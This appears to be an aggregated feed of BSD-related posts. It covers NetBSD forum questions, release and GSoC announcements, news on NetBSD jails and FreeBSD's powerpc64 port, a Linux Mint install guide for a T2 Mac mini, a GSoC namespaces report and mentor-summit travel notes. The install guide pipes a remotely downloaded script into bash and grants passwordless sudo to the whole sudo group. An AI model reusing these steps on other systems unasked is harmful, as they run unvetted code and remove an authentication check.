From my teacher in question 03, then lots of tinkering. It’s probably a similar story for many people.

77. Do you ever force elements to do things they’re not supposed to?

No, seems a bit rude.

78. Thoughts on floating elements?

I think they exist.

79. When you’re sizing stuff, what do you use first? Do you use px, em, %, or something else?

I used pt when I started with CSS, because I only cared about text. Then px for the longest time. Thesedays I try to use em.

80. Do you have a favourite font?

URW Gothic. It’s balanced, retro-modern, kerns well with negative spacing, and is geometrically satisfying. I also have a soft spot for Futura, though only for headings.

81. Would you run a website with another person? How would that work?

I run the Sasara Wiki with Clara. Everyone should have a family wiki! I also ran various anime club sites over the years in university. They work(ed) via an HTTP server.

82. Do you surf the Web to find new personal websites very often?

Not often enough. Also, respect for capitalising Web. We need to get back to remembering that’s what we used to have, and should be building again.

83. Do you bookmark other people’s websites? How would you feel knowing someone else bookmarked yours?

I do. And intimidated, admittedly.

84. What do you want people to be most impressed with when they see your website?

I’m not out to impress people.

85. Are you interested in technology outside of websites? Do you collect?

Retrocomputing, servers, storage, metadata, document management, and databases. Though much of this now come with the downside of needing networking, which isn’t as interesting (sorry, NOCs)!

86. How often and for how long are you online?

Too much.

87. When it comes to your website, who is your target audience?

Myself, mostly. If other people find something interesting, so much the better.

88. Have you ever been interested in XHTML?

Yes! I’m an XML tragic. We had this awesome framework for transforming documents for any viewport we could have ever wanted. Then we threw it all away for a shortsighted “living” standard that means it’s impossible to validate a document at any specific point in time. Massive missed opportunity, but oh well.

89. Do you program in general? Have you ever written a program for use with or on your website, not counting simple JavaScript?

I do, but on the server side, where this stuff belongs (cough)!

90. Speaking of programs that help you make websites, what do you think of static site generators (SSGs)? Have you ever used one?

Static site generators have a place. I’ve been using Hugo for the last decade, and it does simplify a lot.

91. Do you keep a hitcounter? Why or why not?

Yes, this one. It makes me smile.

92. Do you frequent forums? Which ones?

I do yes, albeit with aliases like everyone does.

93. Do you write your page content directly into the editor, or do you prepare it elsewhere, like a text document or a Word document?

I write in Vim and/or Kate.

94. Do you think you appear cool to others? A more accurate answer now: do other people ever say you’re cool?

I hope not.

95. Are you embarrassed of your old work? Have you ever deleted everything out of shame?

Definitely; you haven’t grown if you’re not. I’ve only deleted a handful posts, because I prefer to leave notes.

96. Would you close down your website if you couldn’t update it, or would you leave an archive?

Good question… not sure. I guess my git repo would act as an archive. Being statically generated means I wouldn’t need to maintain a bunch of services to keep it running.

97. Do you reveal a lot about yourself on your website? Or are you more secretive?

Kind of, but I also obfuscate. People think my name is Ruben Schade, for example.

98. Are you willing to reveal who your best online friend is, and/or if they have a website?

You, reading this :). Unless you’re a dick.

99. And do you optimise the images on your website?

I do yeah, through pngcrush and jpegoptim.

100. We’re out of time! How do you feel after answering 100 questions? ....other than exhausted.

A coffee would be nice.

By Ruben Schade in Sydney, 2026-03-05.

I just installed NetBSD 10.1 on a Ryzen 7 system and I have X.org working.
Still a little problem: how do I get a 80x25 or larger text-screen on all system consoles? The command wsconfctl -dw Boldface changes only the first (c-a-f1) console, and this font is afaik not even in /usr/share/wscons/fonts. Trying wsconfctl or wsfontload to set a font on consoles 2, 3 and 4 does nothing.
Why does a default NetBSD install come up with an acceptable kernel boot font and then switch to 64x25 for some reason? How can I keep the initial kernel font for all consoles? I don't care if it's green.
Can this have to do with the Nnvidia GTX 1050 and no board-graphics? I wouldn't be surprised...

FreeBSD has its jails technology, and it seems NetBSD might be getting something similar soon.

Jails for NetBSD aims to bring lightweight, kernel-enforced isolation to NetBSD.

[…]

The system is intended to remain fully NetBSD-native. Isolation and policy enforcement are integrated into the kernel’s security framework rather than implemented in a separate runtime layer.

It does not aim to become a container platform. It does not aim to provide virtualization.

↫ Matthias Petermann

It has all the usual features you have come to expect from jails, like resource quota, security profiles, logging, and so on. Processes inside jails have no clue they’re in a jail, and using supervisor mode, jails are descendent from a single process and remain visible in the host process table. Of course, there’s many more features listed in the linked article.

It’s in development and not a default part of NetBSD at this time. The project, led by Matthias Petermann, is developed out of tree, with an unofficial NetBSD 10.1 ISO with the jails feature included available as well.

I partitioned a clean 2TB drive with Linux. 1G = UEFI (empty), 275G NetBSD, and after installing NetBSD, 275G OpenBSD.
I installed and did some configuring package adding to NetBSD. Then used Linux to create the OpenBSD partition, and changed the type to OpenBSD, so it would recognize it. Then installed OpenBSD. All went well. When I rebooted, I get a menu from NetBSD that is prior to the normal one. It says:
Fn: diskn
1: NetBSD

2. swap

Of course swap is OpenBSD, and it boots just fine. My question is how to change "swap" to OpenBSD? The UEFI part is still completely empty, and I'm wanting to add FreeBSD after I get this sorted out. Then Linux and install rEFInd because it boots all of the above.
I've searched for boot menu; multiboot and though I came across some interesting things, nothing tells me what I want to know. I looked in boot.cfg, but it does not have those entries listed. It does have two entries for booting listed, but I'm not convinced that file needs editing. The man page for it didn't look like it would do me any good.

I'm still setting up my system in the tty, and getting the following persistent warning

Firmware Error (ACPI): Could not resolve symbol [\_SB.PCI0.LPCB.HEC.ECRD], AE_NOT_FOUND
ACPI Error: Aborting method \_TZ.TZ00._TMP due to previous error (AE_NOT_FOUND)

Can anyone help with this? I know they can probably be safely ignored, but while I'm in the TTY setting up my system I'd like to mute them if possible

We are happy to announce that The NetBSD Foundation will participate in Google Summer of Code 2026!

Would you like to learn how to contribute to open source? Google Summer of Code is a great chance to contribute to NetBSD and/or pkgsrc!

You can find a list of possible projects at Google Summer of Code project page. Please do not limit yourself to the project list... If have any cool idea/project about NetBSD and/or pkgsrc please also propose your one!

Please reach us via #netbsd-code IRC channel on Libera.Chat and/or via mailing lists.

If you are more interested about Google Summer of Code, please also check the homepage at g.co/gsoc.

Looking forward to a great Summer!

The NetBSD project is pleased to announce the first release candidate of the upcoming 11.0 release, please help testing!
See the release announcement for details.

The netbsd-11 release branch is nearly a year old now, so it is high time the 11.0 release makes it to the front stage.

Please note that various ISO images have been split into small ones for CD/R media and full featured DVD ones. If you are not restricted by the size limits of a CD/R medium, make sure to pick the image with "-dvd.iso" in the name.

If you want to test 11.0 RC1 please check the installation notes for your architecture and download the preferred install image from the CDN or if you are using an ARM based device from the netbsd-11 builds from the bootable ARM images page.

If you have any issues with installation or run into issues with the system during use, please contact us on one of the mailing lists or file a problem report.

Rust is everywhere, and it’s no surprise it’s also made its way into the lowest levels of certain operating systems and kernels, so it shouldn’t be surprising that various operating system developers have to field questions and inquiries about Rust. NetBSD developer Benny Siegert wrote a blog post about this very subject, and in it, details why it’s unlikely Rust will find its way into the NetBSD base system and/or the kernel

First, NetBSD is famed for its wide architecture and platform support, and Rust would make that a lot more troublesome due to Rust simply not being available on many platforms NetBSD supports. Rust release cycles also aren’t compatible with NetBSD, it would draw a lot of dependency code into the base system, and keeping Rust and its compiler toolchain working is a lot of work that falls on the shoulders of a relatively small group of NetBSD developers.

Note that while NetBSD does tend to take a more cautious approach to these matters than, say, Linux or FreeBSD, the operating system isn’t averse to change on principle. For instance, not only is Lua part of the base system, it’s even used in the NetBSD kernel due to its ability to rapidly develop and prototype kernel drivers. In short, while it doesn’t seem likely Rust will make it into the NetBSD base system, it’s not an impossibility either.

In the late 1980s, with the expansion of the Internet (even though it was not open to commercial activities yet) and the slowly increasing capabilities of workstations, some people started to imagine the unthinkable: that, some day, you may use your computer to record voice messages, send them over the Internet, and the recipient could listen to these messages on his own computer.

That was definitely science fiction… until workstation manufacturers started to add audio capabilities to their hardware.

↫ Miod Vallat

A great story detailing how the audio hardware in the HP 9000/425e was made to work on OpenBSD and NetBSD.

My email inbox is like the pile of documents on my desk. Things that I wanted to get back to ends up moving towards the bottom, into the never-ending pile of … stuff. For the first time in a while, I have looked at the bottom – and found an inquiry from someone who had seen my presentation at FOSDEM 2024.

They had a question for me, which I am going to paraphrase below. I am going to reproduce my answer here because it may be interesting for others.

Happy almost 2026!  Some end-of-year lists linked here.

• The annoyances of the traditional Unix ‘logger’ program.
• Grow slowly, stay small.  Anti-enshittification, if you will.  Related.
• MidnightBSD 4.0 is out.  (via)
• The original Mozilla “Dinosaur” logo artwork.
• The Typeframe PX-88 Portable Computing System.  But what’s this PS-85?(via)
• The Best Metal Albums and the Best Electronic Music of 2025.
• What are your favorite Shadertoys?
• “Greatest Comics of All Time” meta-list.  A statistical answer.  I would change the relative positions of some of them, but read anything listed that you haven’t already.  (via)
• The best comics of 2025, as chosen by our contributors.  Perhaps better, to follow up on.
• pkgsrc-2025Q4 released.

Last week, the VPN provider I previously used went dark for days and went back with no explanation. They have an history of not communicating much and their support does suck but TBH I almost never used it, nevertheless I felt it was time for a change. I asked on BlueSky for feedback and one of the suggestions caught my eye: IVPN.
They have very good reviews, support WireGuard and an OpenBSD developer worked there. Their documentation is very Linux-centric but very well put, yet -of course- it lacks examples for NetBSD. So here’s a simple way of setting up a WireGuard VPN with IVPN on NetBSD.

I have some potentially devastating news for POWER users interested in using FreeBSD, uncovered late last month by none other than Cameron Kaiser.

FreeBSD is considering retiring powerpc64 prior to branching 16, which would make FreeBSD 15 the last stable version to support the architecture. (32-bit PowerPC is already dropped as of FreeBSD 14, though both OpenBSD and NetBSD generally serve this use case, and myself I have a Mac mini G4 running a custom NetBSD kernel with code from FreeBSD for automatic restart.) Although the message says “powerpc64 and powerpc64le” it later on only makes specific reference to the big-endian port, whereas both endiannesses appear on the FreeBSD platform page and on the download server.

↫ Cameron Kaiser

There’s two POWER9 systems in my office, so this obviously makes me quite sad. At the same time, though, it’s hard not to understand any possible decision to drop powerpc64/powerpc64le at this point in time. Raptor’s excellent POWER9 systems – the Blackbird, which I reviewed a few years ago, and the Talos II, which I also have – are very long in the tooth at this point and still quite expensive, and thanks to IBM royally screwing up POWER10, we never got any timely successors. There were rumblings about a possible POWER11-based successor from Raptor back in July 2025, but it’s been quiet on that front since.

In other words, there are no modern powerpc64 and powerpc64le systems available. POWER10 and brand new POWER11 hardware are strictly IBM and incredibly expensive, so unless IBM makes some sort of generous donation to the FreeBSD Foundation, I honestly don’t know how FreeBSD is supposed to keep their powerpc64 and powerpc64le ports up-to-date with the latest generation of POWER hardware in the first place.

It’s important to note that no final decision has been made yet, and since that initial report by Kaiser, several people have chimed in to argue the case that at least powerpc64le (the little endian variant) should remain properly supported. In fact, Timothy Pearson from Raptor Engineering stepped up the place, and stated he’s willing to take over maintainership of the port, as Raptor has been contributing to it for years anyway.

Raptor remains committed to the architecture as a whole, and we have resources to assist with development. In fact, we sponsor several FreeBSD build machines already in our cloud environment, and have kernel developers working on expanding and maintaining the FreeBSD codebase. If there is any concern regarding hardware availability or developer resources, Raptor is willing and able to assist.

↫ Timothy Pearson

Whatever decision the FreeBSD project makes, the Linux world will be fine for a while yet as IBM contributes to its development, and popular distributions still consider POWER a primary target. However, unless either IBM moves POWER hardware downmarket (extremely unlikely) or the rumours around Raptor have merit, I think at least the FreeBSD powerpc64 (big endian) port is done for, with the powerpc64le port hopefully being saved by people hearing these alarm bells.

No theme, just fun.

• Dithering, part 1.  (via)
• A1 DEADLINE SPECIAL.  Resurrecting a high-water point in comics history with new stories.  (via)
• Ken Thompson interviewed in 2024.  Talking about inventing UNIX.
• Consider a year-end donation to NetBSD.  (via)
• Appendix N Jam.  The winners.  (via)
• Advanced Readings in D&D, a series.  Accidentally found while searching my own archives.
• OS6, an operating system I hadn’t heard of before.  (via)
• Mr. TIFF.  (via)
• Brenda.
• A Pentium in your hand.  These are almost becoming common.

My 2018 Mac mini (64G RAM, 2T SSD) has long been a trusty multi-VM pkgsrc and notqmail build machine, mostly via SSH. And during the first couple COVID years when I was still consulting independently but we were out of the country, it was also a trusty low-latency system for collaborative coding sessions with USA-based clients, mostly via screen sharing.

The mini still performs quite well. I still rely on it for keeping my NetBSD VPS running on the latest -current pkgsrc every week or so. But macOS NFS service had a tendency to be a source of annoyance and/or effort on each new major release. NetBSD’s NFS client got fixed, which was enough to get me by, but my Tribblix and Linux VMs had already been basically unusable for a while. And macOS had lately gotten a little unstable after reboot: sometimes misrendering the login screen, freezing after a correctly entered password, or suddenly pegging the fans for no apparent reason and powering abruptly off. So when macOS Tahoe dropped support for nearly all Intel Macs, I was already game to repave mine.

I generally prefer NetBSD when possible, and generally consider my non-NetBSD systems to be only temporarily so (e.g., Small ARMs). Hosting a pile of nvmm-accelerated VMs while also building natively for my primary NetBSD production target would have been a solid use case. But the 2018 mini has a T2 security chip that makes a bunch of basic onboard devices relatively difficult for an OS to attach, and Linux appears to be the only free OS that mostly deals with this. Even then, we’ll need a T2-customized installer and special attention.

1. Prepare installer

$ cd ~/Downloads
$ bash <<<1 <(curl -sL https://github.com/t2linux/T2-Mint/releases/latest/download/iso.sh)
$ sudo dd if=linuxmint-*-cinnamon-*-t2-*.iso of=/dev/$YOUR_USB_STICK
$ rm -f linuxmint-*-cinnamon-*-t2-*.iso

2. Prepare machine

1. Reboot and hold down Command-R.
2. In macOS Recovery, choose Utilities -> Startup Security Utility.
3. Secure Boot: No Security.
4. Allowed Boot Media: Allow booting from external or removable media.
5. Connect USB keyboard/mouse/Ethernet directly (not via Bluetooth or Thunderbolt dock).
6. Quit Startup Security Utility.

3. Install

1. Reboot and hold down Option.
2. Choose your USB stick.
3. In the live environment, open Terminal.
4. Wipe, partition, and format the disk:

   $ for i in \
   "mklabel gpt" \
   "mkpart ESP fat32 1MiB 513MiB" \
   "set 1 esp on" \
   "set 1 boot on" \
   "mkpart Root btrfs 513MiB 100%"; do
   sudo parted $YOUR_DISK_DEVICE $i
   done
   $ sudo mkfs.fat -F32 -n ESP ${YOUR_DISK_DEVICE}p1
   

5. In the live environment, run Install.
6. Instead of “Erase disk and install Linux Mint”, choose “Something else”.
7. Click the btrfs partition -> “Change…”.
8. Use as: btrfs journaling file system.
9. Format the partition: [x].
10. Mount point: /.
11. ”Install Now” and follow the prompts until “Installation Complete”.
12. DO NOT click “Continue Testing” or “Restart Now”. We’re not ready for the new install to be unmounted.

4. Tweak new install

1. Enter newly installed environment:

   $ for i in proc dev dev/pts; do
   sudo mount -B /$i /target/$i
   done
   $ sudo chroot /target
   

2. From now on, track configuration changes in git:

   # echo | apt install etckeeper
   # cd /etc
   # git branch -m pet-power-plant
   # git gc --prune
   

3. Configure grub:

   # echo 'GRUB_RECORDFAIL_TIMEOUT=0' > default/grub.d/60_skip_grub_prompt.cfg
   # etckeeper commit -m 'Skip grub prompt.'
   # update-grub
   

4. Give Mac boot picker a custom icon:

   # apt install libarchive-tools
   # curl -sL https://master.dl.sourceforge.net/project/mac-icns/mac-icns.iso \
   | bsdtar -xOf- iconverticons.com/os_linuxmint.icns \
   > /boot/efi/.VolumeIcon.icns
   

5. Return to the “Installation Complete” dialog (finally!) and click “Restart Now”.

5. Before first boot

1. When prompted, remove USB stick and press Enter.
2. On reboot, hold down Command-R.
3. In macOS Recovery, choose Utilities -> Terminal.
4. Give Mac boot picker a custom label:

   # diskutil list
   # diskutil mount /dev/$YOUR_EFI_SYSTEM_PARTITION_DEVICE
   # bless --folder /Volumes/ESP/EFI/BOOT --label "Linux Mint"
   

5. Reboot and hold down Option.
6. Observe the icon and label. Fancy! Someday you’ll hold down Option again, and this’ll help you disambiguate which volume you’re trying to boot.

6. First boot

1. Go for it!
2. Observe no grub prompt, just straight through the Mint logo to the login screen.
3. Log in.
4. Enable passwordless sudo:

   $ echo '%sudo ALL=(ALL: ALL) NOPASSWD: ALL' \
   | sudo tee /etc/sudoers.d/10sudo_nopasswd >/dev/null
   $ sudo chmod 440 /etc/sudoers.d/10sudo_nopasswd
   $ sudo etckeeper commit -m 'Skip sudo password prompt.'
   

5. Allowlist your Thunderbolt dock, if any:

   $ boltctl list                   # find your device's UUID
   $ sudo boltctl enroll --policy auto $YOUR_THUNDERBOLT_UUID
   

6. Fetch WiFi and Bluetooth firmware:

   $ sudo apt install dmg2img
   $ echo 7 | sudo get-apple-firmware get_from_online
   

7. Connect Ethernet/WiFi/mouse/keyboard as you prefer.
8. Enable T2 fan control and SSH service:

   $ echo | sudo apt install t2fanrd openssh-server
   $ sudo systemctl enable --now ssh
   $ sudo etckeeper commit -m 'Enable sshd.'
   

9. Update device firmware:

   $ echo y | sudo fwupdmgr get-updates
   

   (Note that the Mac’s EFI can’t be updated this way. The only way to update Mac EFI is as a side effect of installing the latest macOS.)
10. Follow the post-install Welcome prompts.
11. In “Account details”, add my photo.
12. Install some basics:

    $ echo | sudo apt install tmux vim myrepos tig silversearcher-ag qemu-system-x86-64 kdeconnect dropbox
    

7. Back to work

1. Mount source trees from NAS. (Oh hey, I finally have a NAS! Similar post forthcoming about that.)
2. Create a NetBSD VM to match my production VPS.
3. Build a fresh batch of packages.
4. Carry on with life.

I’ve got some older Mac minis that may also soon find gainful employment around here.

This report was written by Vasyl Lanko as part of Google Summer of Code 2025.

Introduction

As of the time of writing, there is no real sandboxing technique available to NetBSD. There is chroot, which can be considered a weak sandbox because it modifies the root directory of the process, effectively restricting the process' view of the file system, but it doesn't isolate anything else, so all networking, IPC, and mounts inside this restricted file system are the same as of the system, and are accessible.

There has already been some research on implementing kernel-level isolation in NetBSD with tools like gaols, mult and netbsd-sandbox, but they haven't been merged to NetBSD. Other operating systems have their own ways to isolate programs, FreeBSD has jails, and Linux has namespaces.

Project Goals

The goal of this project is to bring a new way of sandboxing to NetBSD. More specifically, we want to implement a mechanism like Linux namespaces. These namespaces allow the isolation of parts of the system from a namespace, or, as the user sees it, from an application.

NetBSD has compat_linux to run Linux binaries on NetBSD systems, and the implementation of namespaces can also be utilized to emulate namespace-related functionality of Linux binaries.

A simple example to visualize our intended result is to consider an application running under an isolated UTS namespace that modifies the hostname. From the system's view, the hostname remains the same old hostname, but from the application's view it sees the modified hostname.

Project Implementation

Linux has 8 namespace types, in this project we will focus on only 2 of them:

• UTS namespace, it is the simplest so we can focus on building the general namespace infrastructure with little namespace-specific details
• mount namespace, it is a prerequisite to most other namespace types because UNIX follows the philosophy of "everything is a file", so we need a separate mount namespace to have different configuration files on the same location as the system.

Linux creates namespaces via the unshare or clone system calls, and it will also be our way of calling the namespace creation logic.

We setup the base for implementing Linux namespaces in the NetBSD kernel using kauth, the subsystem managing all authorization requests inside the kernel. It associates credentials with objects, and because the namespace lifecycle management is related to the credential lifecycle it handles all the credential inheritance and reference counting for us. (Thanks kauth devs!)

We separate the implementation of each namespace in a different secmodel, resulting in a similar framework to Linux which allows the isolation of a single namespace type. Our implementation also allows users to pick whether they want to have namespace support, and of what kind, via compilation flags, just like in Linux.

UTS namespace

UTS stands for UNIX Timesharing System, because it allows multiple users to share a single computer system. Isolating the utsname can be useful to give users the illusion that they have control over the system's hostname, and also, for example, to give different hostnames to virtual servers.

The UTS namespace stores the namespace's hostname, domain name, and their lengths. To isolate the utsname we need to first create a copy of the current UTS information, plus we need a variable containing the number of credentials referencing this namespace, or, in simpler terms, the reference count of this namespace.

This namespace specific information needs to be saved somewhere, and for that we use the credential's private_data field, so we can use a UTS_key to save and retrieve UTS related information from the secmodel. The key specifies the type of information we want to retrieve from the private_data, hence using a UTS_key for the UTS namespace. The key for each namespace is a fixed value (we don't create a new key for every credential), but the retrieved value for that key from different credentials may be different.

We had to modify kernel code that was directly accessing the hostname and domainname variables, to instead call get_uts(), which retrieves the UTS struct for the namespace of the calling process. We didn't modify occurrences in kernel drivers because drivers are not part of any namespace, so they should still access the system's resources directly.

MNT namespace

The MNT namespace isolates mounts across namespaces. It is used to have different versions of mounted filesystems across namespaces, meaning a user inside a mount namespace can mount and unmount whatever they want without affecting or even breaking the system.

The mount namespace structure in Linux is fairly complicated. To have something similar in NetBSD we need to be able to control the mounts accessed by each namespace, and for that we need to control what is each namespace's mountlist, this is also enough for unmounting file systems, because in practice we can just hide them.

For the mount_namespace, mountlist structure and the number of credentials using the mount namespace are stored in the credential's private data with the MNT_key. Similarly to the UTS namespace, we had to modify kernel code to not directly access the mountlist, but instead go through a wrapper called get_mountlist() which returns the correct mountlist for the namespace the calling process resides in.

Implementation for the mount namespace is immensely more complex than for the UTS namespace, it involves having a good understanding of both Linux and NetBSD behaviour, and I would frequently find myself wondering how to implement something after reading the Linux man pages, which would lead to me looking for it in the Linux source code, understanding it, then going back to NetBSD source code, trying to implement it, and seeing it's too different to implement in the same way.

Project Status

You can find all code written during this project in GitHub at maksymlanko/netbsd-src gsoc-bubblewrap branch. Because I intend to continue this work outside of GSoC, I want to reinforce that this was the last commit still during GSoC on gsoc-bubblewrap branch and this was the last one for the mnt_ns still WIP branch.

The link includes implementation of general namespace code via secmodels, implementation of the UTS namespace and related ATF-tests, and the work-in-progress implementation of mount namespaces.

The mount namespace functionality is not finished as it would require much more work than the time available for this project. To complete it, it would be required invasive and non-trivial changes to the original source code, and, of course, more time.

Future Work

As previously mentioned, Linux has 8 namespace types, it is important to see which of the missing namespaces are considered useful and feasible to implement.

I believe that after mount namespaces it would be interesting to implement PID namespaces as this in combination with mount namespaces would permit process isolation from this sandbox. Afterwards, implementing user namespaces would allow users to get capabilities similar to root in the namespace, giving them sudo permissions while still restricting system-wide actions like shutting down the machine.

A lower hanging fruit is to implement the namespace management functionality, which in Linux is lsns to list existing namespaces, and setns to move the current process to an already existing namespace.

Challenges

• Semantics. Did you know the unmount system call with MNT_FORCE flag in Linux (usually) returns EBUSY, and in NetBSD it forces the unmounting? One of them makes it easier to implement mount namespaces.
• The behaviour of namespaces is not fully specified in the man pages. If something is not clear from the man pages you need to read the source code.
• Unexpected need to learn a lot of VFS concepts and their differences in NetBSD and Linux.
• There was a much bigger research component than I anticipated.

In the end, Linux and NetBSD are different operating systems, implemented in different ways. Linux is complex and it is not trivial to port namespaces to NetBSD.

Notes

The project is called "Using bubblewrap to add sandboxing to NetBSD" and was initially projected to emulate the unshare system call into compat_linux, but, seeing that having namespaces could be useful for NetBSD, and that it would be easy to add to compat_linux afterwards, we decided to instead implement namespaces directly in the NetBSD kernel. Implementing other system calls necessary to make the bwrap linux binary work correctly also wouldn't be as satisfying as implementing namespaces directly into NetBSD, so this was why the project was initially called "Using bubblewrap to add sandboxing to NetBSD" but nowadays it would be more accurate to call it "Sandboxing in NetBSD with Linux-like namespaces".

Thanks

I am very grateful to Google for Google Summer of Code, because without it I wouldn't have learned so much this summer, wouldn't have met with smart and interesting people, and for sure wouldn't have tried to contribute to a project like NetBSD, even if I always wanted to write operating systems code... But, the biggest thing I will take with me from this project is the confidence to be able to contribute to NetBSD and other open source projects.

I would also like to thank the members of the NetBSD organization for helping me throughout this project, and more specifically:

• Taylor R. Campbell, Harold Gutch and Nia Alarie from IRC, for helping me fix a nasty LD_LIBRARY_PATH bug I had on my system which wouldn't let me finish compiling NetBSD, and general GSoC recomendations.
• Emmanuel Dreyfus from tech-kern, with whom I discussed ideas for projects and proposal suggestions, and in the end inspired the namespaces project.
• Christoph Badura and Leonardo Taccari who volunteered to be my mentors. They took time to research and answer my questions, anticipated possible problems in my approaches, and always pointed me in the right direction, daily, during all of GSoC's period. This project is from the 3 of us.

I just came back home from Google Summer of Code 2025 Mentor Summit. We were 185 mentors from 133 organizations and it was amazing!

Google Summer of Code (GSoC) is a program organized by Google with the focus to bring new developers to open source projects.

The NetBSD Foundation has been participating in GSoC since 2005.

After nearly a decade being part of GSoC for The NetBSD Foundation, first as student and then as mentor and org admin, I finally attended my first GSoC Mentor Summit! That was a fantastic, very intense and fun experience! I met with a lot of new folks and learned about a lot of other cool open source projects.

Let's share my travel notes!

Wednesday 22, October 2025: arriving in Munich

Going to Munich is relatively doable by train from my hometown. I departed from Urbisaglia-Sforzacosta at 6:59 in the morning. I had around 25 minutes to wait for the change from Ancona to Bologna. I arrived in Bologna at around 11:30 where I met Andrea, my friend and favorite music pusher since childhood. We had lunch together, eating tasty miso veggie ramen, drank some hot sake and then we had coffee. He then accompanied me back to the station where I had the train to Munich Central Station at 13:50.

The scenery from the train was really nice. Near Trento and Bolzano/Bozen, full of vineyards and apple orchards with mountains in the background. It was cloudy for most of the travel but starting from Bressanone/Brixen I began to see «beautiful blue skies and golden sunshine». After Bressanone the scenery was more uncontaminated with light green grazing lands. Unfortunately when reaching Brennero/Brenner (last Italian city before Austria) it started to get dark and I had not enjoyed the rest of the scenery in Austria and Germany. I arrived in Munich at 20:50 and checked in at my hotel which was around 1km from the station.

For this journey I was not alone! Also Christoph Badura (<bad@>) was a delegate for Google Summer of Code and we had been in touch to get dinner and beers together. Christoph had some train delays but at 21:40 we were able to meet and went for a walk a bit to the south-east to find some places to eat and drink. I had done my homework for the beer places (obviously!) but the place in my TODO list to visit on Wednesday did not have a lot of food so we decided to first go to a restaurant and we found Ha Veggie - Vietnamese Cuisine. I had some Edamame and Bò xào sả ớt, a delicious dish with seitan, vegetables, lemongrass and chili pepper.

We then stopped at Frisches Bier, a bit too late, but the publican was kind enough and she permitted us a last round. I had a pint of a refreshing Hoppebräu Wuide Hehna Session IPA.

We then took a walk back to our hotels, talked a bit and went to sleep.

Thursday 23, October 2025: 1st day of Mentor Summit

Thursday was the first day of the Mentor Summit. The summit was in Munich Marriott Hotel, more in the north of the city, around 5km from the central station.

I checked out of my hotel and walked to the city center in Marienplatz and nearby. I also stopped in a couple of shops to grab some souvenirs for my family and friends and then took a long walk in the direction of Munich Marriott Hotel, to hopefully be there at 13:00 sharp for the start of check-in of GSoC Mentor Summit.

Rear of the Siegestor showing its inscription that can be translated to "Dedicated to victory, destroyed by war, urging peace"

I walked through Ludwigstraße and enjoyed the architecture around me, walking near LMU University and Siegestor. I then proceeded through Leopoldstraße and Ungererstraße and then arrived to the Munich Marriott Hotel.

Chris was already in the lobby and he had already checked in. We talked a bit and then I checked in as well. The room was huge and comfy! I quickly went back down to the lobby. We then checked in for Mentor Summit and I finally met Stephanie, Mary and Lucy, the GSoC Program Admins. I also took with me from home some classical and specialty Italian chocolate (Cioccolato di Modica) for the chocolate room (more about that later!) and left the bars in the chocolate room.

The time from 13:00-17:00 was reserved to actually permit mentors to arrive. At 13:00 there were still not a lot of mentors around so with Chris we decided to have lunch. We had lunch in a trattoria where we had an antipasto of grilled vegetables, penne all'arrabbiata with red wine from Montepulciano.

While eating Chris talked about the Tantris but we were already full. We had not tasted the haute cuisine but walked there to just look at the restaurant building. O:)

Tables full of chocolate and sweets from the chocolate room

When we came back to Munich Marriott Hotel, I went to the chocolate room to taste some chocolate/sweets. In GSoC Mentor Summit it is a tradition to bring great quality chocolate - or other sweets for places where chocolate is less usual - so folks can taste sweets from all over the world. That's a very nice initiative! I was curious more about non-chocolate sweets completely new to me so I had some Laddu and Kaju katli, both delicious!

I spent the rest of the afternoon down at the Champions Bar socializing with other mentors.

We had dinner at around 19:00 with good food accompanied by a couple of glasses of Primitivo.

At 20:15 we had the Opening Session. Stephanie, Mary and Robert warmly welcomed us. They shared the schedule and introduced to the unconference format of the sessions. We then had dessert and played the GSoC 2025 Mentor Summit Scavenger Hunt. The Scavenger Hunt is a game where you can meet and find 25 different folks with something that could be common (e.g. «prefers spaces (not tabs)») to something pretty rare (e.g. «has jumped out of a helicopter»). This game was nice because it was also a great conversation starter. I met a lot of mentors both of open source software that I regularly use but also learned about new interesting open source software and organizations while doing that!

We had time until Friday 12:30 and 10 lucky mentors who completed it (at the end around 60 of 185 were able to complete) got randomly selected and they got special prizes.

I stayed up until probably 1am or so, socializing a bit more in the lobby and then went back to my room to have some sleep, knowing that Friday was completely packed with Lightning talks and sessions!

Friday 24, October 2025: 2nd day of Mentor Summit

I had breakfast around 8:20 at the Green's Restaurant. I sat at a table together with other folks and after a minute I saw a known name in front of me: Lourival Pereira Vieira Neto <lneto@>! I was very happy to meet another NetBSD developer and that was a complete surprise. He was there as a mentor of the LabLua organization.

GSoC Program Admins welcomed us for the day and recapped the schedule for Friday and Saturday.

Lightning talks, round 1

The lightning talks consisted of mentors presenting their best GSoC 2025 projects. The format was fast and fun: a maximum of 3 minutes for the talk and a maximum of 4 slides! We had presentations from 18 different mentors and orgs and all of them were able to stay under 3 minutes!

That was a great occasion also to learn about open source projects, new orgs and the experiences shared were interesting too.

GSoC Feedback Session

After the 1st round of Lightning Talks I attended the GSoC Feedback Session. That was a Q&A session with program admins and org admins/mentors.

Hot topics this year were AI usage and spam applications that were not discussed as part of this session because there were two other separate sessions regarding that later.

If I only have one sentence to summarize this session... I should quote Robert sharing that Google Summer of Code is about the journey for the contributors and mentors to get involved in open source. The coding is only the means to an end.

"Hallway track", lunch and group photo

After the first session I decided to take a break and instead stay in the "hallway track" where I met new folks and socialized a bit. Another funny and at the same time a bit embarrassing for me thing of GSoC is that I often met someone and after a couple of minutes of talk I can associate the face with a name and I figured out that I'm an avid user / pkgsrc MAINTAINER of the software they contribute to! :)

At 12:30 we had lunch at Green's Restaurant and then at 13:40 we had a group photo and it was pretty tricky to put around 200 folks (program admins and mentors) on the stage of the Ballroom! :)

Let's talk about improving diversity + inclusion in FOSS!

In the afternoon I joined the session about improving diversity. In open source unfortunately there are a lot of underrepresented groups and we should fix that.

There were a lot of experiences shared from several orgs, food for thought for me! Only to name few topics: Outreachy, how to know and create safe spaces, importance of localization in software and documentation, be sure to make underrepresented folk as part of key people and also try to take the burden of other tasks off them.

GSoC and AI

Artificial Intelligence (AI), in particular Generative AI (GenAI) has been a hot topic since project proposals opened this year!

Some people consider it a speed-up for researching but at the same time it impedes learning.

In NetBSD - according to our Commit Guidelines - code generated by large language model (LLM) or similar technologies is considered tainted code because such models can be trained on copyrighted materials and such resulting code can then violate copyright.

More than 80% of GSoC contributors who filled an anonymous survey used AI, mainly for code generation, code completion, text generation, debugging and error detection.

Most mentors are usually not happy with the outcomes of AI with code often resulting in buggy/vulnerable and poor quality, violating copyright and some mentors also pointed out that as part of mentoring we should also make contributors aware of environmental/ecological impact of such use.

However, both contributors' and mentors' surveys on AI are relatively small dataset (around 90 mentors and 90 contributors).

Lightning talks, round 2

At 16:00 we had the 2nd and last round of Lightning talks. That was another great opportunity to learn more about more projects and organizations!

Asynchronous I/O by Ethan Miller

